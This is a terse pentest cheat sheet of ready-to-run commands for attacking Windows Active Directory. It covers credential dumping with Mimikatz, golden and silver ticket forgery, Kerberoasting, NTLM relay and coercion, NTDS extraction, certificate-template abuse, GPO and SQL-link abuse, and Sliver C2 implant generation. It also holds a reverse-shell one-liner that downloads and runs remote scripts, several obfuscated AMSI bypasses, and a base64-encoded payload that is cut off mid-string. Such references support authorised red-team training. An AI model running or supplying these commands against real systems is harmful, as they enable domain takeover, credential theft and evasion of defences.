
Quick reference for common pentest commands. No fluff, just commands.

Mimikatz

Setup

Import-Module C:\Temp\Invoke-Mimikatz.ps1

Dump Credentials

Invoke-Mimikatz -Command '"token::elevate" "privilege::debug" "sekurlsa::logonpasswords"'
Invoke-Mimikatz -Command '"lsadump::sam"'
Invoke-Mimikatz -Command '"lsadump::cache"'
Invoke-Mimikatz -Command '"vault::cred /patch"'

# LSASS MiniDump (stealthier) — write the dump via comsvcs.dll, then load and parse it in the mimikatz console with the two commands below
rundll32.exe C:\windows\system32\comsvcs.dll, MiniDump <LSASS_PID> C:\Temp\lsass.dmp full
sekurlsa::minidump C:\Temp\lsass.dmp
sekurlsa::logonpasswords

# Remote dump
Invoke-Mimikatz -DumpCreds -ComputerName <target>

Pass-the-Hash / Ticket

# PTH
Invoke-Mimikatz -Command '"sekurlsa::pth /user:administrator /domain:corp.local /ntlm:<HASH> /run:powershell.exe"'

# Export & inject ticket
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
Invoke-Mimikatz -Command '"kerberos::ptt .\ticket.kirbi"'
klist # view tickets
klist purge # clear tickets

DCSync

Invoke-Mimikatz -Command '"lsadump::dcsync /domain:corp.local /user:corp\krbtgt"'
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:corp.local /all /csv"'

Bypass LSA Protection

reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL  # check
mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove

Golden / Silver Ticket

# Golden
Invoke-Mimikatz -Command '"kerberos::golden /domain:corp.local /sid:<SID> /krbtgt:<HASH> /user:Administrator /id:500 /ptt"'

# Silver (CIFS)
Invoke-Mimikatz -Command '"kerberos::golden /domain:corp.local /sid:<SID> /target:<TARGET> /service:CIFS /rc4:<HASH> /user:Administrator /ptt"'

AD Enumeration

AD Module

Get-ADUser -Filter * | Select -ExpandProperty samaccountname
Get-ADComputer -Filter * | select -expand name
Get-ADGroup -Identity 'Domain Admins' -Properties *
Get-ADGroupMember -Identity 'Domain Admins'
Get-ADTrust -Filter *
(Get-ADForest).Domains
Get-ACL 'AD:\CN=Domain Admins,CN=Users,DC=corp,DC=local' | select -ExpandProperty Access

PowerView — Domain

. ./PowerView.ps1
Get-NetDomain
Get-DomainSID
Get-NetDomainController
Get-NetUser | select samaccountname
Get-NetUser -AdminCount 1
Get-NetGroup
Get-NetGroupMember -GroupName "Domain Admins"
Get-NetComputer
Get-NetDomainTrust

PowerView — GPO

Get-DomainGPO | select displayname
Get-DomainGPOLocalGroup
Get-DomainGPOComputerLocalGroupMapping -ComputerIdentity <computer>
Get-DomainGPOUserLocalGroupMapping -Identity <user>
Get-DomainOU
(Get-DomainOU -Identity DevOps).distinguishedname | %{Get-DomainComputer -SearchBase $_} | select name

# GPP - find cpassword
findstr /S /I cpassword \\dc.corp.local\sysvol\corp.local\policies\*.xml

PowerView — ACL

Get-ObjectACL -SamAccountName <account> -ResolveGUIDS
Invoke-ACLScanner -ResolveGUIDs | select IdentityReference, ObjectDN, ActiveDirectoryRights

# Check DCSync rights
Get-ObjectAcl -DistinguishedName "dc=corp,dc=local" -ResolveGUIDs | ? {($_.IdentityReference -match "<user>") -and ($_.ObjectType -match 'replication')}

# Check GenericAll on Domain Admins
Get-ObjectAcl -SamaccountName "Domain Admins" -ResolveGUIDS | ?{$_.identityReference -match '<user>'}

# Add DCSync rights
Add-ObjectAcl -TargetDistinguishedName 'DC=corp,DC=local' -PrincipalSamAccountName <user> -Rights DCSync -Verbose

BloodHound

. ./sharphound.ps1
Invoke-Bloodhound -CollectionMethod All -Verbose
Invoke-BloodHound -Stealth
Invoke-Bloodhound -CollectionMethod LoggedOn -Verbose
SharpHound.exe --Stealth

Sessions & Admin Access

Find-LocalAdminAccess -Verbose
Invoke-UserHunter -Groupname "Domain Admins"
Invoke-UserHunter -CheckAccess
. ./Invoke-SessionHunter.ps1
Invoke-SessionHunter -FailSafe

Kerberos Attacks

Kerberoast

Get-NetUser -SPN | select samaccountname, serviceprincipalname
Request-SPNTicket "MSSQLSvc/dc.corp.local"
Invoke-Mimikatz -Command '"Kerberos::list /export"'
hashcat -m 13100 hash.txt rockyou.txt

AS-REP Roast

Get-DomainUser -PreauthNotRequired | select samaccountname
Invoke-ASREPRoast -Verbose | fl
hashcat -a 0 -m 18200 hash.txt rockyou.txt

Unconstrained Delegation

Get-Netcomputer -UnConstrained | select samaccountname
Invoke-Mimikatz -Command '"sekurlsa::tickets"'
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
Invoke-Mimikatz -Command '"kerberos::ptt <kirbi>"'

Constrained Delegation

Get-DomainUser -TrustedToAuth | select samaccountname, msds-allowedtodelegateto
Get-Domaincomputer -TrustedToAuth | select samaccountname, msds-allowedtodelegateto

# kekeo
Tgt::ask /user:<user> /domain:<domain> /rc4:<hash>
Tgs::s4u /tgt:<tgt> /user:Administrator@<domain> /service:cifs/dc.corp.local
Invoke-Mimikatz -Command '"kerberos::ptt <kirbi>"'

Child to Parent (Trust Escalation)

Invoke-Mimikatz -Command '"lsadump::trust /patch"' -Computername <dc>

# Golden Ticket with SID history
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<child> /sid:<child_sid> /sids:<parent_sid>-519 /krbtgt:<hash> /ticket:trust.kirbi"'

Lateral Movement

# PSRemoting
Enter-PSSession -Computername <target>
$sess = New-PSSession -Computername <target>
Invoke-Command -Computername <target> -Scriptblock {whoami}
Invoke-Command -FilePath <script> $sess

# WinRS (more opsec)
winrs -r:<target> -u:<domain>\<user> -p:<pass> cmd

# Load remote script
iex (iwr http://<ip>/script.ps1 -UseBasicParsing)

# Copy file to remote
Copy-Item .\tool.ps1 \\<target>\c$\'Program Files'

# runas
runas /netonly /user:domain\user cmd.exe

# Add local admin + enable RDP
net user <user> <pass> /add /Y && net localgroup administrators <user> /add && net localgroup "Remote Desktop Users" <user> /add && reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

NTLM Relay

# 1. Disable SMB/HTTP/LDAP in /etc/responder/Responder.conf, then:
responder -dvw -I eth0

# 2. Find targets without SMB signing
nxc smb --gen-relay-list smb_targets.txt 10.10.10.0/24

# 3. Relay
impacket-ntlmrelayx -socks -smb2support -tf smb_targets.txt

# 4. Configure /etc/proxychains4.conf -> socks5 127.0.0.1 1080
proxychains4 nxc smb <IP> -u <user> -d <domain>

PrinterBug (MS-RPRN)

# Check if spooler is running
nxc smb <targets> -u user -p password -M spooler

# Force DC authentication to attacker machine
python3 printerbug.py '<DOMAIN>/<User>@<DC_IP>' <attacker_IP>

# Catch with ntlmrelayx (relay to target without SMB signing)
impacket-ntlmrelayx -t smb://<target> -socks -smb2support

Golden Ticket

# Get krbtgt hash and domain SID on DC
privilege::debug
lsadump::lsa /inject /name:krbtgt

# Forge ticket
kerberos::golden /User:Administrator /domain:corp.local /sid:<SID> /krbtgt:<HASH> /id:500 /ptt

# Open session
misc::cmd

NTDS Dump

# VSS - vssadmin
vssadmin create shadow /for=C:
copy "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit" C:\Temp\
copy "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM" C:\Temp\
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL

# diskshadow
diskshadow
set context persistent nowriters
add volume C: alias myshadow
create
expose %myshadow% Z:

# ntdsutil
ntdsutil "ac i ntds" "ifm" "create full c:\temp\dump" q q

# Remote secretsdump
secretsdump.py domain/user:pass@<DC_IP>

# NetExec
nxc smb <DC_IP> -u user -p pass --ntds

LAPS

# LAPSv1 - password stored in cleartext attribute
Get-ADComputer <machine> -Properties ms-MCS-AdmPwd | select ms-MCS-AdmPwd

# Windows LAPS - msLAPS-Password attribute (plaintext JSON; the encrypted form is stored in msLAPS-EncryptedPassword instead)
Get-ADComputer <machine> -Properties msLAPS-Password | select msLAPS-Password

# NetExec
nxc smb <target> -u user -p pass -M laps
nxc ldap <DC> -u user -p pass -M laps

Token Impersonation

# In Meterpreter
load incognito
list_tokens -u
impersonate_token "DOMAIN\Administrator"

# Add user to Domain Admins via token
add_user hacker Password123! -h <DC_IP>
add_group_user "Domain Admins" hacker -h <DC_IP>

SLIVER C2

# Install & start
curl https://sliver.sh/install | sudo bash
sudo apt install mingw-w64
sliver

# Listener
mtls --lhost <attacker_IP> --lport 443

# Generate implants
generate beacon --mtls <attacker_IP> --os windows --arch amd64 --format exe --save /tmp/implant.exe
generate --mtls <attacker_IP> --os linux --arch amd64 --format elf --save /tmp/implant

# Interact
sessions
use <session_id>
whoami
shell

# Armory
armory install seatbelt
armory install rubeus

SMB Enumeration

# Nmap
nmap --open -p 139,445 <range>
nmap --script smb-protocols -p 445 <IP>
nmap --script smb-vuln* -p 445 <IP>

# Linux
smbclient -L //<IP>
enum4linux <IP> -a
nxc smb <IP> --shares
nxc smb <IP> --shares -u '' -p '' # anonymous
nxc smb <IP> --shares -u guest -p guest # guest
nxc smb <IP> --shares -u user -p pass -d domain # authenticated
# Windows
net view \\<IP>
Get-SMBShare -ComputerName <target>

Wmiexec

# Impacket
impacket-wmiexec domain/user:password@<IP>
impacket-wmiexec domain/user@<IP> -hashes :<NTLM_HASH>
proxychains4 impacket-wmiexec domain/user:password@<IP>
# Native WMI
Invoke-WmiMethod -ComputerName <target> -Class Win32_Process -Name Create -ArgumentList "cmd.exe /c whoami > C:\out.txt"
Get-WmiObject -Class win32_operatingsystem -ComputerName <target>

Rubeus

Ask TGT

# With AES256 key (OPSEC)
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:<user> /aes256:<AES_KEY> /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

# With certificate (PFX)
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:administrator /certificate:esc1-DA.pfx /password:SecretPass@123 /ptt

Golden Ticket (OPSEC / evasive)

# Generate OPSEC-friendly command (auto-fetches params via LDAP)
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-golden /aes256:<AES_KEY> /sid:<DOMAIN_SID> /ldap /user:Administrator /printcmd

# Forge + inject golden ticket
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-golden /aes256:<AES_KEY> /user:Administrator /id:500 /domain:corp.local /sid:<SID> /ptt

# Inter-realm golden ticket (with SID history for Enterprise Admins)
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-golden /user:Administrator /id:500 /domain:<child_domain> /sid:<child_sid> /sids:<parent_sid>-519 /aes256:<krbtgt_aes> /netbios:<short_domain> /ptt

Silver Ticket (evasive)

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:krbtgt/<DOMAIN> /rc4:<HASH> /sid:<SID> /sids:<PARENT_SID>-519 /ldap /user:Administrator /nowrap

S4U (Constrained Delegation abuse)

# User account
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args s4u /user:<user> /aes256:<AES_KEY> /impersonateuser:Administrator /msdsspn:"CIFS/dcorp-mssql.corp.local" /ptt

# Computer account with altservice (service class swap)
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args s4u /user:dcorp-adminsrv$ /aes256:<AES_KEY> /impersonateuser:Administrator /msdsspn:time/dcorp-dc.corp.local /altservice:ldap /ptt

# RBCD abuse
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args s4u /user:student$ /aes256:<AES_KEY> /msdsspn:http/<target> /impersonateuser:administrator /ptt

Monitor (capture TGTs — Unconstrained Delegation)

C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/Rubeus.exe -args monitor /targetuser:DCORP-DC$ /interval:5 /nowrap

Pass-the-Ticket

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args ptt /ticket:<base64_ticket>

# Ask TGS from ticket
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgs /service:http/mcorp-dc.CORP.LOCAL /dc:mcorp-dc.CORP.LOCAL /ptt /ticket:<base64_ticket>

RBCD

Identify write permissions

Find-InterestingDomainACL | ?{$_.identityreferencename -match '<user>'}

Configure RBCD

Set-DomainRBCD -Identity <target_computer> -DelegateFrom '<domain>\<controlled_computer>$' -Verbose
Get-DomainRBCD # verify

Extract keys and exploit

# Extract AES keys of controlled computer account
C:\AD\Tools\Loader.exe -Path C:\AD\Tools\SafetyKatz.exe -args "sekurlsa::evasive-keys" "exit"

# Abuse S4U2Self + S4U2Proxy
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args s4u /user:<computer>$ /aes256:<AES_KEY> /msdsspn:http/<target> /impersonateuser:administrator /ptt

# Access
winrs -r:<target> cmd

AD CS — ESC1 / ESC3

Enumerate

C:\AD\Tools\Certify.exe cas                        # find CAs
C:\AD\Tools\Certify.exe find # all templates
C:\AD\Tools\Certify.exe find /enrolleeSuppliesSubject # ESC1 candidates
C:\AD\Tools\Certify.exe find /vulnerable # ESC3 candidates

ESC1 — Enroll as any user (ENROLLEE_SUPPLIES_SUBJECT)

# Request cert for Domain Admin
C:\AD\Tools\Certify.exe request /ca:<CA_SERVER>\<CA_NAME> /template:"<TEMPLATE>" /altname:administrator

# Convert to PFX
C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc1.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\esc1-DA.pfx

# Get TGT
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:administrator /certificate:esc1-DA.pfx /password:SecretPass@123 /ptt

ESC3 — Enrollment Agent abuse

# Step 1 - Get Enrollment Agent cert
C:\AD\Tools\Certify.exe request /ca:<CA_SERVER>\<CA_NAME> /template:SmartCardEnrollment-Agent
C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc3.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\esc3-agent.pfx

# Step 2 - Request cert on behalf of Domain Admin
C:\AD\Tools\Certify.exe request /ca:<CA_SERVER>\<CA_NAME> /template:SmartCardEnrollment-Users /onbehalfof:dcorp\administrator /enrollcert:C:\AD\Tools\esc3-agent.pfx /enrollcertpw:SecretPass@123

# Step 3 - Get TGT
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:administrator /certificate:esc3-DA.pfx /password:SecretPass@123 /ptt

SQL Server Abuse

Import-Module C:\AD\Tools\PowerUpSQL-master\PowerupSQL.psd1

# Discover SQL instances
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose

# Check connectivity
Get-SQLConnectionTestThreaded
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose

# Enumerate links
Get-SQLServerLink -Instance <sql_instance> -Verbose
Get-SQLServerLinkCrawl -Instance <sql_instance> -Verbose

# Execute commands via xp_cmdshell
Get-SQLServerLinkCrawl -Instance <sql_instance> -Query "exec master..xp_cmdshell 'whoami'"

# Target specific DB
Get-SQLServerLinkCrawl -Instance <sql_instance> -Query "exec master..xp_cmdshell 'whoami'" -QueryTarget <target_db>

# OPENQUERY pivot
select * from openquery("DCORP-SQL1",'select * from master..sysservers')

# Enable xp_cmdshell
Execute('sp_configure "xp_cmdshell",1;reconfigure;') AT "<sql_instance>"

# Reverse shell via SQL link
Get-SQLServerLinkCrawl -Instance <sql_instance> -Query 'exec master..xp_cmdshell ''powershell -c "iex (iwr -UseBasicParsing http://<ip>/amsibypass.txt);iex (iwr -UseBasicParsing http://<ip>/Invoke-PowerShellTcp.ps1)"''' -QueryTarget <target>

GPO Abuse

Enumerate

Get-DomainGPO -Identity 'DevOps Policy'
Get-DomainGPO | select displayname
# Check GenericAll / WriteDACL on a GPO
Find-InterestingDomainACL | ?{$_.identityreferencename -match '<user>'}

NTLM Relay to LDAP → modify GPO DACL

# Listener (Ubuntu WSL)
sudo ntlmrelayx.py -t ldaps://<DC_IP> -wh <attacker_IP> --http-port '80,8080' -i --no-smb-server

# Trigger authentication (force target to auth to attacker)
powershell.exe -Command "Invoke-WebRequest -Uri 'http://<attacker_IP>' -UseDefaultCredentials"
# Or copy a malicious .lnk to a monitored share
xcopy C:\AD\Tools\student.lnk \\<target>\<share>

# Connect to LDAP shell
nc 127.0.0.1 11000

# Grant write rights on GPO
write_gpo_dacl <user> {<GPO_GUID>}

GPOddity — inject malicious GPO

sudo python3 gpoddity.py \
--gpo-id '<GPO_GUID>' \
--domain '<domain>' \
--username '<user>' \
--password '<pass>' \
--command 'net localgroup administrators <user> /add' \
--rogue-smbserver-ip '<attacker_IP>' \
--rogue-smbserver-share '<share_name>' \
--dc-ip '<DC_IP>' \
--smb-mode none

Host the malicious GPT

# Linux (WSL)
mkdir /mnt/c/AD/Tools/stdx-gp
cp -r GPT_Out/* /mnt/c/AD/Tools/stdx-gp

# Windows - create share
net share stdx-gp=C:\AD\Tools\stdx-gp /grant:Everyone,Full
icacls "C:\AD\Tools\stdx-gp" /grant Everyone:F /T

Force GPO refresh

winrs -r:<target> cmd
gpupdate /force

Coercion Methods

PrinterBug (MS-RPRN)

C:\AD\Tools\MS-RPRN.exe \\<target_dc> \\<attacker_listener>
python3 printerbug.py '<domain>/<user>@<DC_IP>' <attacker_IP>

Windows Search Protocol (MS-WSP)

C:\AD\Tools\Loader.exe -path C:\AD\tools\WSPCoerce.exe -args <target_dc> <attacker_listener>

DFS Protocol (MS-DFSNM)

C:\AD\Tools\DFSCoerce-andrea.exe -t <target_dc> -l <attacker_listener>

Trust Key / Inter-Domain Escalation

Extract trust key (from DC)

# Copy loader to DC
echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y
winrs -r:dcorp-dc cmd

# Setup portproxy to fetch tools
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=<attacker_IP>

# Extract trust key
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "lsadump::evasive-trust /patch" "exit"

Forge inter-realm ticket (trust key method — ESC18 style)

# Silver ticket with SID history
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:krbtgt/<CHILD_DOMAIN> /rc4:<trust_key_rc4> /sid:<child_sid> /sids:<parent_sid>-519 /ldap /user:Administrator /nowrap

# Request TGS for parent DC
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgs /service:http/mcorp-dc.<PARENT_DOMAIN> /dc:mcorp-dc.<PARENT_DOMAIN> /ptt /ticket:<base64_ticket>

# Access parent DC
winrs -r:mcorp-dc.<parent_domain> cmd

Golden ticket method (krbtgt hash)

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-golden /user:Administrator /id:500 /domain:<child_domain> /sid:<child_sid> /sids:<parent_sid>-519 /aes256:<krbtgt_aes> /netbios:<short_domain> /ptt

winrs -r:mcorp-dc.<parent_domain> cmd

# DCSync against parent domain
C:\AD\Tools\Loader.exe -path C:\AD\Tools\SafetyKatz.exe -args "lsadump::evasive-dcsync /user:mcorp\krbtgt /domain:<parent_domain>" "exit"

Misc / OPSEC

Invisi-Shell (bypass enhanced logging)

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

AppLocker bypass

# Check AppLocker
reg query HKLM\Software\Policies\Microsoft\Windows\SRPV2
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
$ExecutionContext.SessionState.LanguageMode

# %PROGRAMFILES%\* is usually allowed — drop scripts there
Copy-Item .\script.ps1 \\<target>\C$\'Program Files'

# Disable via GPO if you have GenericAll
runas /user:<domain>\<user> /netonly cmd
gpmc.msc # delete Executable Rules
winrs -r:<target> cmd
gpupdate /force

Portproxy (pivot for tool hosting)

netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=<attacker_IP>
# Then load tools via http://127.0.0.1:8080/<tool>

AMSI Bypass

Set-Item ('Va'+'rI'+'a'+'blE:1'+'q2'+'uZx') ([TYpE]("F"+'rE')) 
(Get-variable (('1Q'+'2U') +'zX'))."A`ss`Embly"."GET`TY`Pe"(('Uti'+'l','A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em'))).g`etf`iElD"(('a'+'msi'),'d',('I'+'nitF'+'aile'))).(sE`T`VaLUE)(${n`ULl},${t`RuE})


sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

$v=[Ref].Assembly.GetType('System.Management.Automation.Am' + 'siUtils'); $v."Get`Fie`ld"('ams' + 'iInitFailed','NonPublic,Static')."Set`Val`ue"($null,$true)

S`eT-It`em ( 'V'+'aR' + 'IA' + (("{1}{0}"-f'1','blE:')+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),(("{0}{1}" -f '.M','an')+'age'+'men'+'t.'),('u'+'to'+("{0}{2}{1}" -f 'ma','.','tion')),'s',(("{1}{0}"-f 't','Sys')+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+("{0}{1}" -f 'ni','tF')+("{1}{0}"-f 'ile','a')) ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+("{1}{0}" -f'ubl','P')+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

Invoke-Command -Scriptblock {sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )} $sess

Invoke-Command ([scriptblock]::Create([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('JABrADgAVgBRADMAIAA9ACAAWwBTAFQAUgBpAE4AZwBdADoAOgBKAG8AaQBuACgAJwAnACwAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAYgB5AHQAZQBbAF0AXQAoADAAeAA1ADMALAAwAHgANwA5ACkAKQApACwAIgAkACgAWwBjAGgAYQByAF0AMAB4ADcAMwApACQAKABbAGMAaABhAHIAXQAwAHgANwA0ACkAJAAoAFsAYwBoAGEAcgBdADAAeAA2ADUAKQAkACgAWwBjAGgAYQByAF0AMAB4ADYARAApACQAKABbAGMAaABhAHIAXQAwAHgAMgBFACkAIgAsACQAKAAkAGsAMwA3ADcANAA9ACcANABDAHYAKAA8ADkAJwA7ACQAYgA9AFsAYgB5AHQAZQBbAF0AXQAoADAAeAA3ADkALAAwAHgAMgAyACwAMAB4ADEAOAApADsAJABrAGIAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAJABrADMANwA3ADQAKQA7AC0AagBvAGkAbgAoADAALgAuACgAJABiAC4ATABlAG4AZwB0AGgALQAxACkAfAAlAHsAWwBjAGgAYQByAF0AKAAkAGIAWwAkAF8AXQAtAGIAeABvAHIAJABrAGIAWwAkAF8AJQAkAGsAYgAuAEwAZQBuAGcAdABoAF0AKQB9ACkAKQAsACIAJAAoAFsAYwBoAGEAcgBdADAAeAA2ADEAKQAkACgAWwBjAGgAYQByAF0AMAB4ADYANwApACQAKABbAGMAaABhAHIAXQAwAHgANgA1ACkAJAAoAFsAYwBoAGEAcgBdADAAeAA2AEQAKQAkACgAWwBjAGgAYQByAF0AMAB4ADYANQApACQAKABbAGMAaABhAHIAXQAwAHgANgBFACkAJAAoAFsAYwBoAGEAcgBdADAAeAA3ADQAKQAkACgAWwBjAGgAYQByAF0AMAB4ADIARQApACQAKABbAGMAaABhAHIAXQAwAHgANAAxACkAJAAoAFsAYwBoAGEAcgBdADAAeAA3ADUAKQAkACgAWwBjAGgAYQByAF0AMAB4ADcANAApACIALAAkACgAJABrADMAMwAyADEAPQAnAHMALgA5AHYAZAA6AD0AZAA6AFQAPgAnADsAJABiAD0AWwBiAHkAdABlAFsAXQBdACgAMAB4ADEAQwAsADAAeAA0ADMALAAwAHgANQA4ACwAMAB4ADAAMgAsADAAeAAwAEQALAAwAHgANQA1ACwAMAB4ADUAMwAsADAAeAA0AEEALAAwAHgANwBCACkAOwAkAGsAYgA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAGsAMwAzADIAMQApADsALQBqAG8AaQBuACgAMAAuAC4AKAAkAGIALgBMAGUAbgBnAHQAaAAtADEAKQB8ACUAewBbAGMAaABhAHIAXQAoACQAYgBbACQAXwBdAC0AYgB4AG8AcgAkAGsAYgBbACQAXwAlACQAawBiAC4ATABlAG4AZwB0AGgAXQApAH0AKQApACwAJAAoACQAawAxADAAMAA4AD0AJwBSAGIAUwBXAFgAUwA6AHgAcABGACcAOwAkAGIAPQBbAGIAeQB0AGUAWwBdAF0AKAAwAHgAMwBGACwAMAB4ADEAMQAs
ADAAeAAzAEEALAAwAHgAMAAyACkAOwAkAGsAYgA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAGsAMQAwADAAOAApADsALQBqAG8AaQBuACgAMAAuAC4AKAAkAGIALgBMAGUAbgBnAHQAaAAtADEAKQB8ACUAewBbAGMAaABhAHIAXQAoACQAYgBbACQAXwBdAC0AYgB4AG8AcgAkAGsAYgBbACQAXwAlACQAawBiAC4ATABlAG4AZwB0AGgAXQApAH0AKQApACwAJAAoACQAawA3ADIAOAA5AD0AJwBSAG4AKQByADcAMgB2AFsAJwA7ACQAYgA9AFsAYgB5AHQAZQBbAF0AXQAoADAAeAAyADYALAAwAHgAMAA3ACwAMAB4ADQANQAsADAAeAAwADEAKQA7ACQAawBiAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAawA3ADIAOAA5ACkAOwAtAGoAbwBpAG4AKAAwAC4ALgAoACQAYgAuAEwAZQBuAGcAdABoAC0AMQApAHwAJQB7AFsAYwBoAGEAcgBdACgAJABiAFsAJABfAF0ALQBiAHgAbwByACQAawBiAFsAJABfACUAJABrAGIALgBMAGUAbgBnAHQAaABdACkAfQApACkAKQA7ACAAJABoAG4AUgBBADMAagBFAFMAIAA9ACAAWwBTAFQAUgBJAG4AZwBdADoAOgBKAG8AaQBuACgAJwAnACwAIAAkACgAJABrADgAMQA0ADEAPQAnAEcALgBoACkAUAA1AGcAPwBJAEkAJwA7ACQAYgA9AFsAYgB5AHQAZQBbAF0AXQAoADAAeAAyADYALAAwAHgANAAzACkAOwAkAGsAYgA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAGsAOAAxADQAMQApADsALQBqAG8AaQBuACgAMAAuAC4AKAAkAGIALgBMAGUAbgBnAHQAaAAtADEAKQB8ACUAewBbAGMAaABhAHIAXQAoACQAYgBbACQAXwBdAC0AYgB4AG8AcgAkAGsAYgBbACQAXwAlACQAawBiAC4ATABlAG4AZwB0AGgAXQApAH0AKQApACwAJAAoACQAawA0ADMAOQAzAD0AJwByAFAAKQB7AF8AKAB0ACcAOwAkAGIAPQBbAGIAeQB0AGUAWwBdAF0AKAAwAHgAMAAxACwAMAB4ADMAOQAsADAAeAA2ADAALAAwAHgAMQA1ACkAOwAkAGsAYgA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAGsANAAzADkAMwApADsALQBqAG8AaQBuACgAMAAuAC4AKAAkAGIALgBMAGUAbgBnAHQAaAAtADEAKQB8ACUAewBbAGMAaABhAHIAXQAoACQAYgBbACQAXwBdAC0AYgB4AG8AcgAkAGsAYgBbACQAXwAlACQ